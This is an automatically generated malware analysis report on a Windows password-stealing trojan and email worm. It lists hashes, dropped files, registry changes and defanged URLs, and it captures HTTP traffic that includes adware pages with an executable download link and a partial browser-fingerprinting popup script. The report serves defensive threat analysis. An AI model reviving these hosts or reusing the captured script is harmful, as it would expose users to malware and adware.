Gen.Variant.Strictor.70570_89f4a39f82

by malwarelabrobot on June 21st, 2017 in Malware Descriptions.

Gen:Variant.Strictor.70570 (B) (Emsisoft), Gen:Variant.Strictor.70570 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 89f4a39f829a6973d4415a4581002b4c
SHA1: ee86964b75f2c06a57e78e389ff37a6448c99783
SHA256: 093d3bae4c983cb56b6588ce3ed5751262dc093fcbe2ff3da7ae3bb572d342b5
SSDeep: 24576:1OxQnugI9Mz3lVuOAQvsF6mBmy2TZaqdiXSp0c02uFG6dAk3CMsetCOv14cC8:1Ox8TqQv0/2TZaqdwk0c05HGisQ28
Size: 2187264 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2017-06-01 10:06:01
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3188

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\kjkjz1[1].htm (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\gjgg[1].htm (3261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\4473463[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\qqkjz13[1].htm (503 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ssggd1[1].htm (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EE3IW6XC.txt (231 bytes)
C:\dc.dll (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017062020170621\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjzgg1[1].htm (1466 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T62H1GAA.txt (231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg456[1].htm (1539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\qqkjz12[1].htm (1273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjz11[1].htm (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\57FH349C.txt (77 bytes)
C:\SkinH_EL.dll (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\mcgg[1].htm (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GN113R0R.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G380XWV8.txt (77 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101020161017 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\57FH349C.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016102820161029 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G380XWV8.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101020161017\index.dat (0 bytes)

Registry activity

The process %original file name%.exe:3188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017062020170621]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFormatTags" = "2"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017062020170621]
"CacheRepair" = "0"
"CachePrefix" = ":2017062020170621:"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFilterTags" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"fdwSupport" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017062020170621]
"CachePath" = "%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017062020170621"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"aFormatTagCache" = "01 00 00 00 10 00 00 00 55 00 00 00 1E 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017062020170621]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"MaxFileSize" = "1048576"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016101020161017]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016102820161029]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5	File path
147127382e001f495d1842ee7a9e7912	c:\SkinH_EL.dll
f803ad370a8649a143429f179af5f3ab	c:\dc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ???????????????
Product Name: ???????????????
Product Version: 5.9.0.0
Legal Copyright: ???????????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.9.0.0
File Description: ???????????????
Comments: ???????????????
Language: Chinese (Simplified, PRC)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	831571	835584	4.51473	ab7a08f7e94f5db0f50e49f07a197f31
.rdata	839680	1227274	1228800	5.1873	16c302cd2e18728a018c665e00e7854f
.data	2068480	315050	86016	3.60789	76e9f58750083d0dde6b120f0036a883
.rsrc	2383872	29708	32768	3.58206	4d869b6a853497953ad122bc4c3aac5f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://ad.51pc114.cn/setup/a.html	122.228.204.12
hxxp://ad.51pc114.cn/setup/ssxczgg2269.txt	122.228.204.12
hxxp://ad.51pc114.cn/ad/ssggd1.htm	122.228.204.12
hxxp://ad.51pc114.cn/ad/qqkjz11.htm	122.228.204.12
hxxp://ad.51pc114.cn/ad/mcgg.htm	122.228.204.12
hxxp://ad.51pc114.cn/ad/qqkjz12.htm	122.228.204.12
hxxp://ad.51pc114.cn/ad/qqkjz13.htm	122.228.204.12
hxxp://ad.51pc114.cn/ad/gjgg.htm	122.228.204.12
hxxp://ad.51pc114.cn/ad/qqkjzgg1.htm	122.228.204.12
hxxp://ad.51pc114.cn/setup/kjkjz1.htm	122.228.204.12
hxxp://popup.jointreport-switch.com/close.php?uid=1130	115.238.244.83
hxxp://js.tongji.linezing.com.danuoyi.tbcache.com/1546091/tongji.js	195.27.31.235
hxxp://ad.51pc114.cn/ad/mcgg456.htm	122.228.204.12
hxxp://js.tongji.linezing.com.danuoyi.tbcache.com/1435675/tongji.js	195.27.31.235
hxxp://js.users.51.la/19059730.js	222.187.254.89
hxxp://grp1.51.la/go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=3&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/qqkjz11.htm&vvtime=1497922737308
hxxp://js.users.51.la/4473463.js	222.187.254.89
hxxp://grp1.51.la/go.asp?svid=3&id=4473463&tpages=1&ttimes=1&tzone=3&tcolor=32&sSize=1276,846&referrer=&vpage=http://ad.7532.com/ad/mcgg456.htm&vvtime=1497922757853
hxxp://ad.7532.com/ad/mcgg456.htm	122.228.204.12
hxxp://web.users.51.la/go.asp?svid=3&id=4473463&tpages=1&ttimes=1&tzone=3&tcolor=32&sSize=1276,846&referrer=&vpage=http://ad.7532.com/ad/mcgg456.htm&vvtime=1497922757853	42.236.74.238
hxxp://123.51pc114.cn/ad/gjgg.htm	122.228.204.12
hxxp://123.51pc114.cn/ad/mcgg.htm	122.228.204.12
hxxp://js.tongji.linezing.com/1435675/tongji.js	195.27.31.235
hxxp://js.tongji.linezing.com/1546091/tongji.js	195.27.31.235
hxxp://123.51pc114.cn/ad/ssggd1.htm	122.228.204.12
hxxp://123.51pc114.cn/ad/qqkjzgg1.htm	122.228.204.12
hxxp://123.51pc114.cn/setup/kjkjz1.htm	122.228.204.12
hxxp://123.51pc114.cn/ad/qqkjz11.htm	122.228.204.12
hxxp://123.51pc114.cn/ad/qqkjz13.htm	122.228.204.12
hxxp://web.users.51.la/go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=3&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/qqkjz11.htm&vvtime=1497922737308	42.236.74.238
hxxp://123.51pc114.cn/ad/qqkjz12.htm	122.228.204.12
u291014.778669.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /ad/gjgg.htm HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: 123.51pc114.cn

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 15198

Content-Type: text/html

Last-Modified: Tue, 21 Jun 2016 02:14:19 GMT

Accept-Ranges: bytes

ETag: "8228749e62cbd11:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:07 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<meta
 name="keywords" content="QQ...."/>..<meta name="description" co
ntent="QQ...."/>..<title>............</title>..<styl
e type="text/css">..<!--...STYLE1 {color: #0000FF}...STYLE2 {fon
t-size: 12px}...STYLE6 {color: #FFFFFF}..-->..</style>..</
head>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..&
lt;html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<me
ta http-equiv="Content-Type" content="text/html; charset=gb2312" />
..<title>QQ..............</title>..<style type="text/cs
s">..<!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}..
.STYLE6 {color: #FFFFFF}..-->..</style>..</head>..<h
tml>..<body>..<body>......<table width="250" border=
"0">..<tr>..<tr>..<tr>..<tr>..    <td cl
ass="STYLE2"> <span class="STYLE1"><a href="hXXp://VVV.753
2.com/" target="_blank" style="color:#FE0000;" onMouseOver="this.style
.color='#FE0000';" onMouseOut="this.style.color='#FE0000';">......Q
Q......................</a></span></td>..    <td&
gt;<span class="STYLE2">[<span class="STYLE1">........<<< skipped >>>

GET /ad/mcgg456.htm HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: ad.7532.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 4406

Content-Type: text/html

Last-Modified: Wed, 02 Mar 2016 05:01:52 GMT

Accept-Ranges: bytes

ETag: "a8b4a0a24074d11:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<meta
 name="keywords" content="QQ...."/>..<meta name="description" co
ntent="QQ...."/>..<title>............</title>..<styl
e type="text/css">..<!--...STYLE1 {color: #0000FF}..body,td,th {
...font-size: 12px;..}...STYLE2 {color: #FF0000}..-->..</style&g
t;..</head>..<html>..<body>........<table width="
494" border="0" cellpadding="0" cellspacing="0">..  <!--DWLayout
Table-->..  <tr>..    <td width="494" height="708" align="
left" valign="top"><table width="236" height="221">..     <
;tr>  <tr>.... </tr>....<tr>..    <tr>..   
     <td height="14" align="left" valign="middle"><a href="ht
tp://shop107817006.taobao.com" target="_blank" style="color:#FF00FF;" 
onmouseover="this.style.color='#FF00FF';" onmouseout="this.style.color
='#FF00FF';">........................</a></td>..       
 <td height="14"><span class="STYLE1">[........]</span&
gt;</td>..      </tr>..<tr>..        <td height="
14" align="left" valign="middle"><a href="hXXp://down.cncpa.net:
9000/mmliao/MM-liao8869.exe" target="_blank" style="color:#2222f0;" on
MouseOver="this.style.color='#2222f0F';" onMouseOut="this.style.co<<< skipped >>>

GET /19059730.js HTTP/1.1

Accept: */*

Referer: hXXp://123.51pc114.cn/ad/qqkjz11.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: js.users.51.la

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Encoding: gzip

Last-Modified: Tue, 07 Mar 2017 07:34:34 GMT

Accept-Ranges: bytes

ETag: "95b649441597d21:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/8.5

Date: Tue, 20 Jun 2017 01:39:00 GMT

Content-Length: 972
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"f.t........<...q........m.zt
...............w.?|po............Rf...w...g.Q..Y......g.w.....C....>
;..p...~>8}.?......N.=.....#......O~......]~|..7N..:..TK(..-....G..
g....[4..........4k.j.}w..%..$...v.V...T.:.6..z..._....U.4k..;..iUV5..
...2.,......j."[..}....m..*.../.^h.u./...]^>.W.....y..i.....~......
Q..V..`...d:....b..j....../X...p.i...@E.vZUo.|... ......j.....g.;..._e
.y....~..........nw>.s.....-..g.uY..=v..[.S..-...2g.n.fw....;w>.
.f..S....q..o.E.o.c.....'..|......s..3..>....G.._..'.G.....v.0..*j.
.|.V....u[......~Tj.3"F.J..b.*ut......e...X .;TR.>.w....WK.}d~.s.K.
.M4....o...........j.....=.$rt. .4D..m.Z....$. _...?.sK....JPX..H.hu~.
KL.v.UK...R7.s.>..eV,.kR.....4k..x...~.1i.|2^7y..n...Y..=..b..._H..
]..[a...p.....V.l>k....eN.l.l..33.....s...;w?.......1..?...u..@PeuU
...'......... .5.m...p.s.....oV..%....3..M.o..v..Z.[.....".,...-..L5}8
...............S..B...HTTP/1.1 200 OK..Content-Type: application/javas
cript..Content-Encoding: gzip..Last-Modified: Tue, 07 Mar 2017 07:34:3
4 GMT..Accept-Ranges: bytes..ETag: "95b649441597d21:0"..Vary: Accept-E
ncoding..Server: Microsoft-IIS/8.5..Date: Tue, 20 Jun 2017 01:39:00 GM
T..Content-Length: 972...............`.I.%&/m.{.J.J..t...`.$..@.......
..iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"f.t....
....<...q........m.zt...............w.?|po............Rf...w...g.Q.
.Y......g.w.....C....>..p...~>8}.?......N.=.....#......O~...<<< skipped >>>

GET /close.php?uid=1130 HTTP/1.1

Accept: */*

Referer: hXXp://123.51pc114.cn/ad/qqkjz12.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: popup.jointreport-switch.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: tengine

Date: Tue, 20 Jun 2017 01:38:34 GMT

Content-Type: text/html; charset=gb2312

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.28

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Cache-Control: no-cache, must-revalidate

Set-Cookie: lgPTN20963270664410=0; expires=Tue, 20-Jun-2017 16:00:00 GMT; path=/; domain=.jointreport-switch.com
222f..(function() {..    var popUrl = 'hXXp://popup.jointreport-switch
.com/jointreport_process.php?ap=MjE2Mnw3MzNkOWJmY2UyZmRlMTAwMmZkMDJlYm
RhMTU5YzhiYmUxMQ==';..    var lgUnionPushUrl = CrazyInitUrl(popUrl);..
    function CrazyInitUrl(urls){..        var sf=0,sc=0,ol='',sd=0;.. 
       var ae = function(p) {..            v = false;..            doc
ument.write('<SCRIPT LANGUAGE=VBScript>\n on error resume next \
n v = IsObject(CreateObject("' p '"))<\/SCRIPT>\n');..          
  if(v){..                return '1';..            }else{..           
     return '0';..            }..        };..        var af = function
(p) {..            var m = '';..            for (var i=0; i < navig
ator.mimeTypes.length; i  ){..                m  = navigator.mimeTypes
[i].type.toLowerCase();..            }..            v = '0';..        
    if (m.indexOf(p) != -1){..                if (navigator.mimeTypes[
p].enabledPlugin != null) v = '1';..            }..            return 
v;..        };..        var __dm  = (navigator.appName.indexOf("Netsca
pe") != -1);..        var __di  = (navigator.userAgent.toLowerCase().i
ndexOf("msie") != -1);..        var __dw = ((navigator.userAgent.toLow
erCase().indexOf("win")!=-1) || (navigator.userAgent.toLowerCase().ind
exOf("32bit")!=-1));..        if(__dw && __di) sf = ae("ShockwaveFlash
.ShockwaveFlash.1");..        if(!__dw || __dm) fs = af("application/x
-shockwave-flash");..        if(navigator.appName=="Netscape"){..     
       ol = navigator.language.substr(0,2);..        }else{..     <<< skipped >>>

GET /1546091/tongji.js HTTP/1.1

Accept: */*

Referer: hXXp://123.51pc114.cn/ad/qqkjzgg1.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: js.tongji.linezing.com

Connection: Keep-Alive


HTTP/1.1 503 Service Temporarily Unavailable

Server: Tengine

Content-Length: 0

Connection: keep-alive

Via: cache8.l2hk1[0,503-0,M], cache26.l2hk1[10013,0], cache9.de1[10529,503-0,M], cache8.de1[30000,10529,504001]

Age: 0

X-Cache: MISS TCP_MISS dirn:-2:-2

X-Swift-SaveTime: Tue, 20 Jun 2017 01:39:15 GMT

X-Swift-CacheTime: 1

Timing-Allow-Origin: *

EagleId: c31b1fd014979227146297101e

HTTP/1.1 503 Service Temporarily Unavailable..Server: Tengine..Content
-Length: 0..Connection: keep-alive..Via: cache8.l2hk1[0,503-0,M], cach
e26.l2hk1[10013,0], cache9.de1[10529,503-0,M], cache8.de1[30000,10529,
504001]..Age: 0..X-Cache: MISS TCP_MISS dirn:-2:-2..X-Swift-SaveTime: 
Tue, 20 Jun 2017 01:39:15 GMT..X-Swift-CacheTime: 1..Timing-Allow-Orig
in: *..EagleId: c31b1fd014979227146297101e..

GET /setup/a.html HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

Host: ad.51pc114.cn


HTTP/1.1 200 OK

Content-Length: 45

Content-Type: text/html

Last-Modified: Fri, 01 Aug 2014 03:58:28 GMT

Accept-Ranges: bytes

ETag: "3efdd9d93cadcf1:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:02 GMT

[EhXXp://ad.51pc114.cn/setup/ex.html]..[n101]HTTP/1.1 200 OK..Content-
Length: 45..Content-Type: text/html..Last-Modified: Fri, 01 Aug 2014 0
3:58:28 GMT..Accept-Ranges: bytes..ETag: "3efdd9d93cadcf1:2be"..Server
: Microsoft-IIS/6.0..Date: Tue, 20 Jun 2017 01:37:02 GMT..[EhXXp://ad.
51pc114.cn/setup/ex.html]..[n101]..

GET /ad/qqkjz13.htm HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: 123.51pc114.cn

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 503

Content-Type: text/html

Last-Modified: Thu, 17 Dec 2015 13:49:22 GMT

Accept-Ranges: bytes

ETag: "6ca0e3bbd138d11:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:07 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>............................</body>..</html>..H
TTP/1.1 200 OK..Content-Length: 503..Content-Type: text/html..Last-Mod
ified: Thu, 17 Dec 2015 13:49:22 GMT..Accept-Ranges: bytes..ETag: "6ca
0e3bbd138d11:2be"..Server: Microsoft-IIS/6.0..Date: Tue, 20 Jun 2017 0
1:37:07 GMT..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
nal//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<
;meta http-equiv="Content-Type" content="text/html; charset=gb2312" /&
gt;..<title>QQ..............</title>..<style type="text
/css">..<!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px
}...STYLE6 {color: #FFFFFF}..-->..</style>..</head>..&l
t;html>..<body>............................</body>..<
;/html>....<<< skipped >>>

GET /setup/ssxczgg2269.txt HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: ad.51pc114.cn

Cache-Control: no-cache


HTTP/1.1 404 Not Found

Content-Length: 1308

Content-Type: text/html

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:02 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>.....
.......</TITLE>..<META HTTP-EQUIV="Content-Type" Content="tex
t/html; charset=GB2312">..<STYLE type="text/css">..  BODY { f
ont: 9pt/12pt .... }..  H1 { font: 12pt/15pt .... }..  H2 { font: 9pt/
12pt .... }..  A:link { color: red }..  A:visited { color: maroon }..&
lt;/STYLE>..</HEAD><BODY><TABLE width=500 border=0 c
ellspacing=10><TR><TD>..<h1>............</h1&g
t;....................................................<hr>..<
p>................</p>..<ul>..<li>...............
.........................................</li>..<li>......
......................................................................
......</li>..<li>....<a href="javascript:history.back(1
)">....</a>....................</li>..</ul>..<
h2>HTTP .... 404 - ..................<br>Internet ........ (I
IS)</h2>..<hr>..<p>..............................<
;/p>..<ul>..<li>.... <a href="hXXp://go.microsoft.co
m/fwlink/?linkid=8180">Microsoft ............</a>..........&l
dquo;HTTP”..“404”........</li>..<li>....
“IIS ....”...... IIS ...... (inetmgr) ....................
....“........”..“............”..“.......
...........”........</li>..</ul>..</TD><<<< skipped >>>

GET /ad/ssggd1.htm HTTP/1.1

Referer: hXXp://123.51pc114.cn/ad/ssggd1.htm

Accept: */*

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Host: 123.51pc114.cn

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Length: 109

Content-Type: text/html

Last-Modified: Fri, 06 Jan 2017 15:11:53 GMT

Accept-Ranges: bytes

ETag: "f231d0362f68d21:2be"

Server: Microsoft-IIS/6.0

Date: Tue, 20 Jun 2017 01:37:06 GMT

....................................,..........5.2....................
............,..........................HTTP/1.1 200 OK..Content-Length
